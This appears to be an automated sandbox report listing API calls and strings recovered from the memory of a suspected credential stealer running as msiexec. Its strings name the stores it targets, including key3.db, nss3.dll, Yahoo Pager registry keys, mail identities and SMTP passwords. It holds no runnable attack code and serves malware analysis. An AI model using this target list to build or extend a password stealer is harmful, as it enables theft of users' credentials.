                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                          • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                        • free.MSVCRT ref: 00409B00
                                                                                          • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                        Similarity
                                                                                        • API ID: ??3@$free
                                                                                        • String ID:
                                                                                        • API String ID: 2241099983-0
                                                                                        APIs
                                                                                          • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                          • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                          • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                        • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                        • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                        • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                        Similarity
                                                                                        • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                        • String ID:
                                                                                        • API String ID: 2775283111-0
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                        • API String ID: 885266447-2471937615
                                                                                        APIs
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                        • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                          • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                          • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                          • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: File$??2@??3@CloseHandleReadSize
                                                                                        • String ID: Ul@$key3.db
                                                                                        • API String ID: 3013762397-1563549157
                                                                                        APIs
                                                                                        • _strcmpi.MSVCRT ref: 0040E134
                                                                                        • _strcmpi.MSVCRT ref: 0040E14D
                                                                                        • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _strcmpi$_mbscpy
                                                                                        • String ID: smtp
                                                                                        • API String ID: 2625860049-60245459
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C28C
                                                                                        • SetFocus.USER32(?,?), ref: 0040C314
                                                                                          • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: FocusMessagePostmemset
                                                                                        • String ID: S_@$l
                                                                                        • API String ID: 3436799508-4018740455
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004092C0
                                                                                        • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                        Strings
                                                                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString_mbscpymemset
                                                                                        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                        • API String ID: 408644273-3424043681
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _mbscpy
                                                                                        • String ID: C^@$X$ini
                                                                                        • API String ID: 714388716-917056472
                                                                                        APIs
                                                                                          • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                          • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                        • String ID: MS Sans Serif
                                                                                        • API String ID: 3492281209-168460110
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ClassName_strcmpimemset
                                                                                        • String ID: edit
                                                                                        • API String ID: 275601554-2167791130
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: strlen$_mbscat
                                                                                        • String ID: 3CD
                                                                                        • API String ID: 3951308622-1938365332
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _mbscat$_mbscpy
                                                                                        • String ID: Password2
                                                                                        • API String ID: 2600922555-1856559283
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: rows deleted
                                                                                        • API String ID: 2221118986-571615504
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                        Similarity
                                                                                        • API ID: ??2@$memset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004048C2
                                                                                        • memset.MSVCRT ref: 004048D6
                                                                                        • memset.MSVCRT ref: 004048EA
                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040D2C2
                                                                                        • memset.MSVCRT ref: 0040D2D8
                                                                                        • memset.MSVCRT ref: 0040D2EA
                                                                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                        • memset.MSVCRT ref: 0040D319
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • __allrem.LIBCMT ref: 00425850
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                        • __allrem.LIBCMT ref: 00425933
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        • too many SQL variables, xrefs: 0042C6FD
                                                                                        • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                        APIs
                                                                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                        • memset.MSVCRT ref: 004026AD
                                                                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                          • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                          • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                        • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                        Similarity
                                                                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C922
                                                                                        • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                        • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                        • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                        Similarity
                                                                                        • API ID: Message$MenuPostSendStringmemset
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                          • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                        • strlen.MSVCRT ref: 0040B60B
                                                                                        • atoi.MSVCRT(?), ref: 0040B619
                                                                                        • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                        • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                        Similarity
                                                                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                        • _gmtime64.MSVCRT ref: 00411437
                                                                                        • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                        • strftime.MSVCRT ref: 00411476
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                        • String ID:
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: strlen
                                                                                        • String ID: >$>$>
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                        • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: @
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _strcmpi
                                                                                        • String ID: C@$mail.identity
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                        • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00444573
                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValuememset
                                                                                        • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00406640
                                                                                          • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                        • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                        • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset$memcmp
                                                                                        • String ID: Ul@
                                                                                        APIs
                                                                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                        • sprintf.MSVCRT ref: 0040B929
                                                                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                        • sprintf.MSVCRT ref: 0040B953
                                                                                        • _mbscat.MSVCRT ref: 0040B966
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                        • String ID:
                                                                                        APIs
                                                                                          • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                        Strings
                                                                                        • recovered %d pages from %s, xrefs: 004188B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                        • String ID: recovered %d pages from %s
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _ultoasprintf
                                                                                        • String ID: %s %s %s
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00409919
                                                                                        • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendmemset
                                                                                        • String ID: N\@
                                                                                        APIs
                                                                                        • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                        • sprintf.MSVCRT ref: 0040909B
                                                                                          • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                          • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                          • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                          • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                          • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                          • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                        • String ID: menu_%d
                                                                                        APIs
                                                                                        Strings
                                                                                        • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _msizerealloc
                                                                                        • String ID: failed memory resize %u to %u bytes
                                                                                        APIs
                                                                                          • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                        • strrchr.MSVCRT ref: 00409808
                                                                                        • _mbscat.MSVCRT ref: 0040981D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName_mbscatstrrchr
                                                                                        • String ID: _lng.ini
                                                                                        APIs
                                                                                        • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                          • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                        • _mbscat.MSVCRT ref: 004070FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscat$_mbscpystrlen
                                                                                        • String ID: sqlite3.dll
                                                                                        APIs
                                                                                        • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString
                                                                                        • String ID: A4@$Server Details
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                        • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                        • memset.MSVCRT ref: 0042C932
                                                                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset
                                                                                        • String ID:
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 0040849A
                                                                                        • memset.MSVCRT ref: 004084D2
                                                                                        • memcpy.MSVCRT(?,00000000,?,?,?,?,68127B60,?,00000000), ref: 0040858F
                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,68127B60,?,00000000), ref: 004085BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLocalmemcpymemsetstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3110682361-0
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                        • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                        • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3510742995-0
                                                                                        APIs
                                                                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$memset
                                                                                        • String ID:
                                                                                        • API String ID: 1860491036-0
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 0040797A
                                                                                        • free.MSVCRT ref: 0040799A
                                                                                          • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                          • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                          • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                        • free.MSVCRT ref: 004079BD
                                                                                        • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3669619086-0